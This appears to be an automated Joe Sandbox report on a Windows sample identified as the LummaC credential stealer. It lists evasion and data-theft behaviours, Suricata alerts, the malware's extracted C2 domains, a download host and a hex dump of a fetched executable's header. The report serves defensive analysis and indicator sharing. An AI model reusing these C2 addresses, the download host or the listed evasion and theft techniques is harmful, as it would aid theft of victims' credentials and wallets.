Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1560223
MD5:44c888b5629af6e043519152b1221c53
SHA1:2013902d11aa2b60de811e8304c385be0c5637a2
SHA256:f6042fe19549edb51ec4e6857327e9cfdda4c66eb89d606259f04ee2dda5f1f0
Tags:exeuser-Bitsight
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Entry point lies outside standard sections
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • file.exe (PID: 4784 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 44C888B5629AF6E043519152B1221C53)
    • chrome.exe (PID: 8020 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
      • chrome.exe (PID: 3064 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 --field-trial-handle=2004,i,13335874620287231471,17284444125503527101,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
    • chrome.exe (PID: 992 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
      • chrome.exe (PID: 1880 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1892 --field-trial-handle=1996,i,18408715541655219885,10244720130942789810,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["processhol.sbs", "p10tgrace.sbs", "p3ar11fter.sbs", "peepburry828.sbs", "3xp3cts1aim.sbs"], "Build id": "LOGS11--LiveTraffic"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    SourceRuleDescriptionAuthorStrings
    00000000.00000003.2292652191.0000000001051000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000000.00000003.2292290513.000000000104F000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Process Memory Space: file.exe PID: 4784JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
          Process Memory Space: file.exe PID: 4784JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Process Memory Space: file.exe PID: 4784JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
              No Sigma rule has matched
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-21T15:17:10.445134+010020283713Unknown Traffic192.168.2.649714188.114.97.3443TCP
              2024-11-21T15:17:12.880771+010020283713Unknown Traffic192.168.2.649715188.114.97.3443TCP
              2024-11-21T15:17:15.650543+010020283713Unknown Traffic192.168.2.649720188.114.97.3443TCP
              2024-11-21T15:17:17.976483+010020283713Unknown Traffic192.168.2.649732188.114.97.3443TCP
              2024-11-21T15:17:20.667175+010020283713Unknown Traffic192.168.2.649739188.114.97.3443TCP
              2024-11-21T15:17:23.401337+010020283713Unknown Traffic192.168.2.649748188.114.97.3443TCP
              2024-11-21T15:17:26.252395+010020283713Unknown Traffic192.168.2.649761188.114.97.3443TCP
              2024-11-21T15:17:31.392255+010020283713Unknown Traffic192.168.2.649772188.114.97.3443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-21T15:17:11.160408+010020546531A Network Trojan was detected192.168.2.649714188.114.97.3443TCP
              2024-11-21T15:17:13.583914+010020546531A Network Trojan was detected192.168.2.649715188.114.97.3443TCP
              2024-11-21T15:17:32.115959+010020546531A Network Trojan was detected192.168.2.649772188.114.97.3443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-21T15:17:11.160408+010020498361A Network Trojan was detected192.168.2.649714188.114.97.3443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-21T15:17:13.583914+010020498121A Network Trojan was detected192.168.2.649715188.114.97.3443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-21T15:17:10.445134+010020577311Domain Observed Used for C2 Detected192.168.2.649714188.114.97.3443TCP
              2024-11-21T15:17:12.880771+010020577311Domain Observed Used for C2 Detected192.168.2.649715188.114.97.3443TCP
              2024-11-21T15:17:15.650543+010020577311Domain Observed Used for C2 Detected192.168.2.649720188.114.97.3443TCP
              2024-11-21T15:17:17.976483+010020577311Domain Observed Used for C2 Detected192.168.2.649732188.114.97.3443TCP
              2024-11-21T15:17:20.667175+010020577311Domain Observed Used for C2 Detected192.168.2.649739188.114.97.3443TCP
              2024-11-21T15:17:23.401337+010020577311Domain Observed Used for C2 Detected192.168.2.649748188.114.97.3443TCP
              2024-11-21T15:17:26.252395+010020577311Domain Observed Used for C2 Detected192.168.2.649761188.114.97.3443TCP
              2024-11-21T15:17:31.392255+010020577311Domain Observed Used for C2 Detected192.168.2.649772188.114.97.3443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-21T15:17:33.986026+010020197142Potentially Bad Traffic192.168.2.649778185.215.113.1680TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-21T15:17:08.855337+010020577301Domain Observed Used for C2 Detected192.168.2.6628321.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-21T15:17:16.533551+010020480941Malware Command and Control Activity Detected192.168.2.649720188.114.97.3443TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: file.exeAvira: detected
              Source: https://cook-rain.sbs/apiets/JcAvira URL Cloud: Label: malware
              Source: https://cook-rain.sbs/CAvira URL Cloud: Label: malware
              Source: https://cook-rain.sbs:443/apisbs:443/apiMYTs9TuPk2hBT00xLEKwQAAAACPkwSk36IN4eV2I8M8fBfL2wa3R5ZlT6PUlAvira URL Cloud: Label: malware
              Source: https://cook-rain.sbs/api8Avira URL Cloud: Label: malware
              Source: https://cook-rain.sbs/VAvira URL Cloud: Label: malware
              Source: https://cook-rain.sbs:443/apiMYTs9TuPk2hBT00xLEKwQAAAACPkwSk36IN4eV2I8M8fBfL2wa3R5ZlT6PUlnjO6F2xxMfQAvira URL Cloud: Label: malware
              Source: https://cook-rain.sbs/apiCJAvira URL Cloud: Label: malware
              Source: file.exe.4784.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["processhol.sbs", "p10tgrace.sbs", "p3ar11fter.sbs", "peepburry828.sbs", "3xp3cts1aim.sbs"], "Build id": "LOGS11--LiveTraffic"}
              Source: file.exeReversingLabs: Detection: 31%
              Source: file.exeJoe Sandbox ML: detected
              Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0HTTP Parser: No favicon
              Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0HTTP Parser: No favicon
              Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0HTTP Parser: No favicon
              Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0HTTP Parser: No favicon
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 20.190.160.14:443 -> 192.168.2.6:49708 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 20.223.35.26:443 -> 192.168.2.6:49711 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 20.223.35.26:443 -> 192.168.2.6:49710 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49714 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49713 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49715 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 20.223.35.26:443 -> 192.168.2.6:49718 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 20.223.35.26:443 -> 192.168.2.6:49717 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 20.223.35.26:443 -> 192.168.2.6:49716 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.6:49719 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49720 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 150.171.28.10:443 -> 192.168.2.6:49728 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 2.23.209.150:443 -> 192.168.2.6:49726 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 150.171.28.10:443 -> 192.168.2.6:49727 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 150.171.28.10:443 -> 192.168.2.6:49730 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 150.171.28.10:443 -> 192.168.2.6:49731 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49732 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49739 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 20.234.120.54:443 -> 192.168.2.6:49738 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49748 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.6:49755 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49761 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.6:49758 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49772 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49789 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 150.171.27.10:443 -> 192.168.2.6:49803 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 20.223.35.26:443 -> 192.168.2.6:49802 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 2.23.209.193:443 -> 192.168.2.6:49821 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 2.23.209.193:443 -> 192.168.2.6:49821 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.6:49909 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49941 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.6:49977 version: TLS 1.2
              Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: file.exe, 00000000.00000003.2471516466.00000000082C0000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2566601730.00000000061B2000.00000040.00000800.00020000.00000000.sdmp

              Networking

              barindex
              Source: Network trafficSuricata IDS: 2057730 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (cook-rain .sbs) : 192.168.2.6:62832 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2057731 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI) : 192.168.2.6:49715 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2057731 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI) : 192.168.2.6:49714 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2057731 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI) : 192.168.2.6:49732 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2057731 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI) : 192.168.2.6:49720 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2057731 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI) : 192.168.2.6:49739 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2057731 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI) : 192.168.2.6:49748 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2057731 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI) : 192.168.2.6:49761 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2057731 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI) : 192.168.2.6:49772 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49714 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49714 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:49720 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:49715 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49715 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49772 -> 188.114.97.3:443
              Source: Malware configuration extractorURLs: processhol.sbs
              Source: Malware configuration extractorURLs: p10tgrace.sbs
              Source: Malware configuration extractorURLs: p3ar11fter.sbs
              Source: Malware configuration extractorURLs: peepburry828.sbs
              Source: Malware configuration extractorURLs: 3xp3cts1aim.sbs
              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 21 Nov 2024 14:17:33 GMTContent-Type: application/octet-streamContent-Length: 2760192Last-Modified: Thu, 21 Nov 2024 14:02:35 GMTConnection: keep-aliveETag: "673f3d7b-2a1e00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 80 2a 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 2a 00 00 04 00 00 65 91 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 78 61 64 6d 67 74 68 69 00 c0 29 00 00 a0 00 00 00 be 29 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 63 73 76 73 6f 6f 62 73 00 20 00 00 00 60 2a 00 00 04 00 00 00 f8 29 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 80 2a 00 00 22 00 00 00 fc 29 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
              Source: Joe Sandbox ViewIP Address: 13.107.246.45 13.107.246.45
              Source: Joe Sandbox ViewIP Address: 13.107.246.44 13.107.246.44
              Source: Joe Sandbox ViewIP Address: 185.215.113.16 185.215.113.16
              Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
              Source: Joe Sandbox ViewJA3 fingerprint: 6271f898ce5be7dd52b0fc260d0662b3
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49715 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49714 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49732 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49720 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49739 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49748 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49761 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49772 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.6:49778 -> 185.215.113.16:80
              Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.14
              Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.14
              Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.14
              Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.14
              Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.14
              Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.14
              Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.14
              Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.14
              Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
              Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
              Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.14
              Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.14
              Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.14
              Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.14
              Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.14
              Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
              Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
              Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
              Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.14
              Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.14
              Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.14
              Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.14
              Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.14
              Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.14
              Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.14
              Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.14
              Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.14
              Source: unknownTCP traffic detected without corresponding DNS query: 20.223.35.26
              Source: unknownTCP traffic detected without corresponding DNS query: 20.223.35.26
              Source: unknownTCP traffic detected without corresponding DNS query: 20.223.35.26
              Source: unknownTCP traffic detected without corresponding DNS query: 20.223.35.26
              Source: unknownTCP traffic detected without corresponding DNS query: 20.223.35.26
              Source: unknownTCP traffic detected without corresponding DNS query: 20.223.35.26
              Source: unknownTCP traffic detected without corresponding DNS query: 20.223.35.26
              Source: unknownTCP traffic detected without corresponding DNS query: 20.223.35.26
              Source: unknownTCP traffic detected without corresponding DNS query: 20.223.35.26
              Source: unknownTCP traffic detected without corresponding DNS query: 20.223.35.26
              Source: unknownTCP traffic detected without corresponding DNS query: 20.223.35.26
              Source: unknownTCP traffic detected without corresponding DNS query: 20.223.35.26
              Source: unknownTCP traffic detected without corresponding DNS query: 20.223.35.26
              Source: unknownTCP traffic detected without corresponding DNS query: 20.223.35.26
              Source: unknownTCP traffic detected without corresponding DNS query: 20.223.35.26
              Source: unknownTCP traffic detected without corresponding DNS query: 20.223.35.26
              Source: unknownTCP traffic detected without corresponding DNS query: 20.223.35.26
              Source: unknownTCP traffic detected without corresponding DNS query: 20.223.35.26
              Source: unknownTCP traffic detected without corresponding DNS query: 20.223.35.26
              Source: unknownTCP traffic detected without corresponding DNS query: 20.223.35.26
              Source: unknownTCP traffic detected without corresponding DNS query: 20.223.35.26
              Source: unknownTCP traffic detected without corresponding DNS query: 20.223.35.26
              Source: unknownTCP traffic detected without corresponding DNS query: 20.223.35.26
              Source: global trafficHTTP traffic detected: GET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=338389&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:068D482D-8F3B-78AE-DAA0-0C08B8FF2AE6&ctry=CH&time=20241121T141651Z&lc=en-CH&pl=en-CH,en-GB&idtp=mid&uid=d215e385-cdc6-4502-a974-fb4c5f95db96&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=f40d71fd2d2f41bca7c5c4d26e91b507&ctmode=MultiSession&arch=x64&betaedgever=0.0.0.0&canedgever=0.0.0.0&cdm=1&cdmver=10.0.19041.1023&devedgever=0.0.0.0&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.19045.2006&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=595198&metered=false&nettype=ethernet&npid=sc-338389&oemName=VMware%2C%20Inc.&oemid=Public&ossku=Professional&scmid=Public&smBiosDm=VMware20%2C1&stabedgever=117.0.2045.55&svcmpt=Red&svgtng=2&svtmexp=1699747200&svtmupd=1696486876&tl=2&tsu=595198&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing=&svoffered=0 HTTP/1.1Accept-Encoding: gzip, deflateX-SDK-CACHE: chs=0&imp=0&chf=0&ds=50543&fs=23594&sc=6X-SDK-HW-TOKEN: 